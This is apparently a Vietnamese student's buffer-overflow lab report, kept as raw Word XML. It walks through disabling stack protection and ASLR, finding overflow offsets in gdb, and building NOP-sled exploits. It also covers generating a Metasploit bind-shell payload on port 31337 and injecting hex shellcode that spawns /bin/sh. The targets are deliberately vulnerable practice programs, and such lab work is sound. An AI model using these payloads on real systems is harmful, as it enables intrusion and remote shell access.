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D2988" w14:textId="175DC1A4" w:rsidR="00EE027A" w:rsidRDefault="00025DBA" w:rsidP="00025DBA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Câu1: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EFD994" w14:textId="3F289AF3" w:rsidR="00F55B39" w:rsidRDefault="00F55B39" w:rsidP="003E1321">
      <w:r>
        <w:t xml:space="preserve">B1: </w:t>
      </w:r>
      <w:r w:rsidR="002C16D1" w:rsidRPr="002C16D1">
        <w:t>mkdir stackoverflow &amp;&amp; cd stackoverflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FAE52F" w14:textId="0B819AD6" w:rsidR="008A1C0F" w:rsidRDefault="008A1C0F" w:rsidP="003E1321">
      <w:r>
        <w:t xml:space="preserve">B2: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A1C0F">
        <w:t>nano buf.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEE1F88" w14:textId="67E6413C" w:rsidR="00B46777" w:rsidRDefault="00B46777" w:rsidP="003E1321">
      <w:r>
        <w:t>Biên dịch chương trình buf.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9453CA" w14:textId="71763105" w:rsidR="00B46777" w:rsidRDefault="00B46777" w:rsidP="003E1321">
      <w:r>
        <w:t>B3: gcc -g -fno-stack-protector -z execstack buf.c -o buf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65079BD4" w14:textId="79406650" w:rsidR="00A735FD" w:rsidRDefault="00A735FD" w:rsidP="003E1321">
      <w:r w:rsidRPr="00A735FD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36A202CC" wp14:editId="00523025">
            <wp:extent cx="4763165" cy="676369"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1753739442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39442" name="Picture 1" descr="A close up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DC1E" w14:textId="15D2DEF6" w:rsidR="00A735FD" w:rsidRDefault="00A735FD" w:rsidP="003E1321">
      <w:r>
        <w:t>B4: ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C49A4C" w14:textId="5BC47E95" w:rsidR="00A735FD" w:rsidRDefault="00A735FD" w:rsidP="003E1321">
      <w:r w:rsidRPr="00A735FD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C38FE76" wp14:editId="5186B0A9">
            <wp:extent cx="3067478" cy="905001"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="4353563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56339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62F7" w14:textId="323C53A9" w:rsidR="002614DA" w:rsidRDefault="002614DA" w:rsidP="003E1321">
      <w:r>
        <w:t xml:space="preserve">B5: </w:t>
      </w:r>
      <w:r w:rsidRPr="002614DA">
        <w:t>$sudo sysctl kernel.randomize_va_space=0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ( </w:t>
      </w:r>
      <w:r w:rsidRPr="002614DA">
        <w:t>Tắt chức năng Address Space Layout Randomization (ASLR)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0494A941" w14:textId="6CAE3847" w:rsidR="001E1B05" w:rsidRDefault="001E1B05" w:rsidP="003E1321">
      <w:r w:rsidRPr="001E1B05">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72B1DC73" wp14:editId="2C630DE8">
            <wp:extent cx="3896269" cy="924054"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="33735138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51385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2DDE" w14:textId="234A072B" w:rsidR="001E1B05" w:rsidRDefault="001E1B05" w:rsidP="003E1321">
      <w:r>
        <w:t>B6 : Khai thác lỗi tràn bộ đệm</w:t>
      </w:r>
      <w:r w:rsidR="00EE5430">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="0097314C">
        <w:t xml:space="preserve">tiền hành </w:t>
      </w:r>
      <w:r w:rsidR="00EE5430">
        <w:t>cài đặt gdp )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D091E8F" w14:textId="04BE0028" w:rsidR="00EE5430" w:rsidRDefault="00EE5430" w:rsidP="003E1321">
      <w:r w:rsidRPr="00EE5430">
        <w:t>$sudo apt update &amp;</w:t>
      </w:r>
      <w:r w:rsidR="0071032C">
        <w:t xml:space="preserve">&amp; sudo </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE5430">
        <w:t>apt install gdb -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BE57B4" w14:textId="7ED2FEC6" w:rsidR="0071032C" w:rsidRDefault="0071032C" w:rsidP="003E1321">
      <w:r>
        <w:t>B7: gdb -q buf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A01F768" w14:textId="6DDB75FA" w:rsidR="0071032C" w:rsidRDefault="0071032C" w:rsidP="003E1321">
      <w:r>
        <w:t xml:space="preserve"> +(gdb)  run AAAA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3DDAC1" w14:textId="2D8A2031" w:rsidR="00EE027A" w:rsidRDefault="00EE027A" w:rsidP="003E1321">
      <w:r>
        <w:t xml:space="preserve">+ run $(python2 -c “print ‘A’*200”) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B47A4A" w14:textId="18487737" w:rsidR="00EE027A" w:rsidRDefault="00EE027A" w:rsidP="00EE027A">
      <w:r>
        <w:t>+ run $(python2 -c “print ‘A’*20</w:t>
      </w:r>
      <w:r w:rsidR="00323ED0">
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068A97FE" w14:textId="7F07A735" w:rsidR="00323ED0" w:rsidRDefault="00323ED0" w:rsidP="00323ED0">
      <w:r>
        <w:t xml:space="preserve">+ run $(python2 -c “print ‘A’*215”) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC302BA" w14:textId="7375838F" w:rsidR="00D94F67" w:rsidRDefault="00D94F67" w:rsidP="00D94F67">
      <w:r>
        <w:t xml:space="preserve">+ run $(python2 -c “print ‘A’*216”) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FC84F5" w14:textId="30F6443E" w:rsidR="006C5025" w:rsidRDefault="006C5025" w:rsidP="006C5025">
      <w:r>
        <w:t>+ run $(python2 -c “print ‘A’*222”)  + y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3455EFC6" w14:textId="1ECF7239" w:rsidR="006C5025" w:rsidRDefault="006C5025" w:rsidP="006C5025">
      <w:r>
        <w:t>+ quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9F5E04" w14:textId="0A752261" w:rsidR="006C5025" w:rsidRDefault="006C5025" w:rsidP="006C5025">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>+ clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1800A3EB" w14:textId="665C8C79" w:rsidR="007E4AFE" w:rsidRDefault="006C5025" w:rsidP="00D94F67">
      <w:r w:rsidRPr="006C5025">
        <w:t>run $</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C5025">
        <w:t xml:space="preserve">(python2 -c </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006C5025">
        <w:t xml:space="preserve">print </w:t>
      </w:r>
      <w:r w:rsidR="00EE1675">
        <w:t xml:space="preserve"> ‘A’</w:t>
      </w:r>
      <w:r w:rsidRPr="006C5025">
        <w:t xml:space="preserve">*100 </w:t>
      </w:r>
      <w:r w:rsidR="00EE1675">
        <w:t>+ ‘B’*12 + ‘C’*8 + ‘D’*6”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0600B996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Câu 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DC5794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 xml:space="preserve">wget -nv </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00025DBA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https://samsclass.info/127/proj/ED3a.c</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7418A96C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wget -nv https://samsclass.info/127/proj/ED3a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71287A36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ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E54BB3" w14:textId="16ABC5F0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69F9BDC" wp14:editId="7408F4FF">
            <wp:extent cx="5943600" cy="1704975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="723417792" name="Picture 1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7792" name="Picture 17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5E306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cd chmod a+x ED3a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44334495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sudo chmod a+x ED3a  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDAD514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./ED3a Hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2D4F02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cat ED3a.c    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183CEB8D" w14:textId="73BFA4E5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42B446D" wp14:editId="5AB8847D">
            <wp:extent cx="5943600" cy="4946015"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="172137871" name="Picture 1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871" name="Picture 16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424E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nano fuzzer </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546DB27B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46"/>
          <w:szCs w:val="46"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#!/usr/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F64F42D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46"/>
          <w:szCs w:val="46"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF80D82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46"/>
          <w:szCs w:val="46"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>length = int(sys.argv[1])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2AFFAD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46"/>
          <w:szCs w:val="46"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>print('A' * length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759F8CAD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chmod a+x fuzzer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E4BA5E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./fuzzer 10 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CE62D1" w14:textId="787FDB94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AECED06" wp14:editId="3C007471">
            <wp:extent cx="4273550" cy="1574800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1790123211" name="Picture 15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3211" name="Picture 15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CE61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./ED3a $(./fuzzer 1020)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65475300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gdb -q ED3a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C481930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run $(./fuzzer 1020)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FB3FBE" w14:textId="74070B12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E4E00CF" wp14:editId="11EE0A1F">
            <wp:extent cx="5943600" cy="2099945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="709279883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9883" name="Picture 1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5F39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nano ex1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7956E9A4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#!/usr/bin/python </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164E33EA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prefix = 'A' * 1000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512A4AE2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pattern = 'BBBBCCCCDDDDEEEEFFFF' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E87A6C0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print( prefix + pattern)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15150E1C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CB1366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chmod a+x ex1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B417FC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gdb -q ED3a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1808CF8E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run $(./ex1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250F261F" w14:textId="4E46D6E3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3181C1F8" wp14:editId="303A7929">
            <wp:extent cx="5943600" cy="2679065"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20078222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2229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46B2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sudo msfvenom -l payloads | grep linux | grep bind_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A42EB2D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sudo msfvenom -p linux/x86/shell_bind_tcp --list-options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6444EAAC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nano ex2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EBB3B5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#!/usr/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6759FDD2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nopsled = '\x90' * 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026B3DAE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buf = "B" * 200  # Định nghĩa biến buf với độ dài 200 ký tự (có thể điều chỉnh độ dài theo nhu cầu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6729EE43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suffix = 'A' * (1012 - len(nopsled) - len(buf))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA66711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eip = '1234'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CCE924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attack = nopsled + buf + suffix + eip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3018EE7C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print(attack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4781CDCF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9C151F8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7273C7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D08D96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chmod +x ex2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D46360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./ex2  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF50FFA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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>gdb -q ED3a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A72A2D7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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>break * 0x08049241</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADDF4B6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2"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>run $(./ex2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4001C575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2"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>info registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F00DD17" w14:textId="0F7A2ADF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sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59FB067B" wp14:editId="37CEB172">
            <wp:extent cx="5943600" cy="5256530"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="569249796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49796" name="Picture 1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8F0C" w14:textId="77777777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32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>x/410x $esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3832BB71" w14:textId="3350879B" w:rsidR="00025DBA" w:rsidRPr="00025DBA" w:rsidRDefault="00025DBA" w:rsidP="00025D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sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E349027" wp14:editId="6B0B8093">
            <wp:extent cx="5943600" cy="3486785"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1925422899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2899" name="Picture 11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B01A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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>$sudo msfvenom -p linux/x86/shell_bind_tcp LPORT=31337 AppendExit=true -e x86/alpha_mixed -f python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786984F2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1E3E44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475E0B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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>nano ex3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEF8D56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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>gdb -q ED3a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270DF5B5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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>run $(./ex3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D97F5F2" w14:textId="23596FE8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118AD820" wp14:editId="6BF14E65">
            <wp:extent cx="5943600" cy="2934970"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="214620647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0647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32E9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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ss -pant | grep 31337 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32482F14" w14:textId="77777777" w:rsidR="00C1168D" w:rsidRDefault="00025DBA" w:rsidP="00025DB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br/>
      </w:r>
      <w:r w:rsidRPr="00025D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25D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25D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25D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C116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 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1642E55D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B1: mkdir stackoverflow &amp;&amp; cd stackoverflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F65E51F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078E4DAF" wp14:editId="7946EEAA">
            <wp:extent cx="5115639" cy="685896"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2141211227" name="Hình ảnh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1227" name="Hình ảnh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A2EA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B2: nano buf.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435DBDE1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313EE386" wp14:editId="54AB5795">
            <wp:extent cx="5544324" cy="590632"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5061450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45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3687" w14:textId="77777777" w:rsidR="00C1168D" w:rsidRDefault="00C1168D" w:rsidP="00C1168D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Biên dịch chương trình buf.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001AD86D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B3: gcc -g -fno-stack-protector -z execstack buf.c -o buf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ED78FC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4C4BC90B" wp14:editId="126C83A4">
            <wp:extent cx="5731510" cy="480695"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6069169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16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158B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B4: ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F124DFD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6802D97B" wp14:editId="505E38A5">
            <wp:extent cx="5731510" cy="595630"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="8664508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50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A3D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B5: $sudo sysctl kernel.randomize_va_space=0 ( Tắt chức năng Address Space Layout Randomization (ASLR) )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFDE35D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49B00089" wp14:editId="00116582">
            <wp:extent cx="5731510" cy="488315"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="15665089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08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54B5" w14:textId="77777777" w:rsidR="00C1168D" w:rsidRDefault="00C1168D" w:rsidP="00C1168D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B6 : Khai thác lỗi tràn bộ đệm( tiền hành cài đặt gdp )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA66937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$sudo apt update &amp;&amp; sudo apt install gdb -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1F2510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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="366FE89F" wp14:editId="7E3BDEAC">
            <wp:extent cx="5731510" cy="1643380"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1428096079" name="Hình ảnh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96079" name="Hình ảnh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DEF5" w14:textId="77777777" w:rsidR="00C1168D" w:rsidRDefault="00C1168D" w:rsidP="00C1168D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10BF387F" w14:textId="77777777" w:rsidR="00C1168D" w:rsidRDefault="00C1168D" w:rsidP="00C1168D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12E70B4C" w14:textId="77777777" w:rsidR="00C1168D" w:rsidRDefault="00C1168D" w:rsidP="00C1168D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B7: gdb -q buf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A92E10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+(gdb)  run AAAA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2958F248" w14:textId="77777777" w:rsidR="00C1168D" w:rsidRPr="00BF38CC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BF38CC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9DA5BD4" wp14:editId="2901AADC">
            <wp:extent cx="5731510" cy="942975"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="1898801338" name="Hình ảnh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1338" name="Hình ảnh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7F29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+(gdb) run $(python2 -c"print 'A'*200")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22421AEB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40048167" wp14:editId="07E53133">
            <wp:extent cx="5731510" cy="1172845"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="1477340007" name="Hình ảnh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40007" name="Hình ảnh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66BC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+(gdb) run $(python2 -c"print 'A'*216")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E5316F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7E9D30C3" wp14:editId="6F64B4BA">
            <wp:extent cx="5731510" cy="1194435"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1420858567" name="Hình ảnh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8567" name="Hình ảnh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41D3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+(gdb) run $(python2 -c"print 'A'*222")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E37EE9B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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05764892" wp14:editId="25CACC67">
            <wp:extent cx="5731510" cy="1263650"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1371852474" name="Hình ảnh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52474" name="Hình ảnh 1" descr="A computer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7792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+(gdb) quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FCC58C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70104A35" wp14:editId="3BFBB556">
            <wp:extent cx="5731510" cy="773430"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="1035394806" name="Hình ảnh 1" descr="A black and white im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94806" name="Hình ảnh 1" descr="A black and white imag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DD3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gdb -q buf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6EEC0F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4268753D" wp14:editId="3C668C90">
            <wp:extent cx="5731510" cy="262255"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="4101616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16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BE37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disassemble main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C27F163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452B3D44" wp14:editId="26DA2216">
            <wp:extent cx="5731510" cy="2335530"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="557278404" name="Hình ảnh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78404" name="Hình ảnh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FA7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break * main+91</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EAB799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195A6B4E" wp14:editId="3CD3437D">
            <wp:extent cx="5731510" cy="257810"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="839989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9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1876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run $(python2 -c"print 'A'*200 + 'B'*8 + 'C'*8 + 'D'*6")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C14354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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FD0D613" wp14:editId="59B14B33">
            <wp:extent cx="5731510" cy="1271270"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1984084083" name="Hình ảnh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4083" name="Hình ảnh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CCE7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x/100x $rsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F017629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019EDB7E" wp14:editId="46571CD5">
            <wp:extent cx="5731510" cy="2571115"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="2074963100" name="Hình ảnh 1" descr="A group of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3100" name="Hình ảnh 1" descr="A group of white text on a black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DE3C" w14:textId="77777777" w:rsidR="00C1168D" w:rsidRDefault="00C1168D" w:rsidP="00C1168D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69406761" w14:textId="77777777" w:rsidR="00C1168D" w:rsidRDefault="00C1168D" w:rsidP="00C1168D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66CAEE4B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x $rsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1224AF55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16F9E9BB" wp14:editId="0C885B6A">
            <wp:extent cx="5731510" cy="296545"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="15752801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01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FB90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x $rbp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCD992F" w14:textId="77777777" w:rsidR="00C1168D" w:rsidRDefault="00C1168D" w:rsidP="00C1168D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF38CC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6627B8FD" wp14:editId="1CF0A6B1">
            <wp:extent cx="5731510" cy="226695"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="1228534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34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59B1" w14:textId="77777777" w:rsidR="00C1168D" w:rsidRDefault="00C1168D" w:rsidP="00C1168D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run $(python2 -c "print 'x90'*152 + '^[[200~\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CFCF4A" w14:textId="77777777" w:rsidR="00C1168D" w:rsidRDefault="00C1168D" w:rsidP="00C1168D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x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A502A9E" w14:textId="77777777" w:rsidR="00C1168D" w:rsidRDefault="00C1168D" w:rsidP="00C1168D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xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307FB5FB" w14:textId="77777777" w:rsidR="00C1168D" w:rsidRDefault="00C1168D" w:rsidP="00C1168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x0f\x05' + 'B'*8 + 'c'*8 + '&lt;Mot dia chi bat ky o vi tri 0 toi 152 cua buffer&gt;'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E753C12" w14:textId="77777777" w:rsidR="00C1168D" w:rsidRDefault="00C1168D" w:rsidP="00C1168D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007078BE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5737938A" wp14:editId="0A23FAAA">
            <wp:extent cx="5731510" cy="2405380"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1411493614" name="Hình ảnh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93614" name="Hình ảnh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48DE" w14:textId="77777777" w:rsidR="00C1168D" w:rsidRDefault="00C1168D" w:rsidP="00C1168D"/>
    <w:p w14:paraId="4084E0FF" w14:textId="42181E1E" w:rsidR="00025DBA" w:rsidRPr="00025DBA" w:rsidRDefault="00025DBA" w:rsidP="00025DB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4B873FF" w14:textId="77777777" w:rsidR="00025DBA" w:rsidRPr="00025DBA" w:rsidRDefault="00025DBA" w:rsidP="00025D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346E3E9" w14:textId="77777777" w:rsidR="00025DBA" w:rsidRPr="00025DBA" w:rsidRDefault="00025DBA" w:rsidP="00025DB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1A25F87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Cau 4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D377783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cd stackoverflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F0C2A4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6680205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gcc -g buf.c -o buf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2237A1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BD1612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sudo sysctl kernel.randomize_va_space=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170490AD" w14:textId="64AE8011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69200B2" wp14:editId="1AA26FFA">
            <wp:extent cx="5943600" cy="1678940"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="96849099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099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EF20C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088EDA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gdb -q buf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045D0888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1CF9E4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set disassembly-flavor intel</w:t>
      </w:r>
    </w:p>
